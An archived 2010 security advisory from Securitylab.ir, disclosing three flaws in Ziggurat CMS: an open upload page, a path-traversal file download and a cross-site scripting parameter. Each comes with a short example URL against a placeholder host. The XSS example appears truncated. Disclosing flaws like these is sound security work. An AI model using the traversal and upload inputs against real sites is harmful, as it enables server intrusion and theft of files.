Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: bx6154.htm

Ziggurat CMS Multiple Vulnerabilities



Ziggurat CMS Multiple Vulnerabilities
Ziggurat CMS Multiple Vulnerabilities



################################################################# =0D
# Securitylab.ir =0D
################################################################# =0D
# Application Info: =0D
# Name: Ziggurat CMS=0D
# Vendor: http://www.farsi-cms.com=0D 
#################################################################=0D
Vulnerability: =0D
=0D
# Arbitrary File Upload=0D
http://site.com/manager/upload.asp=0D 
=0D
# Remote File Download=0D
http://site.com/manager/backup.asp?bck=./../file.asp=0D 
=0D
# Cross Site Scripting=0D
=0D">http://site.com/index.asp?id==0D 
#################################################################=0D
# 2010-04-10 - Vendor notified=0D
# 2010-04-15 - Public disclosure=0D
################################################################# =0D
# Discoverd By: Pouya Daneshmand =0D
# Website: http://Pouya.Securitylab.ir =0D 
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com=0D
###################################################################


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH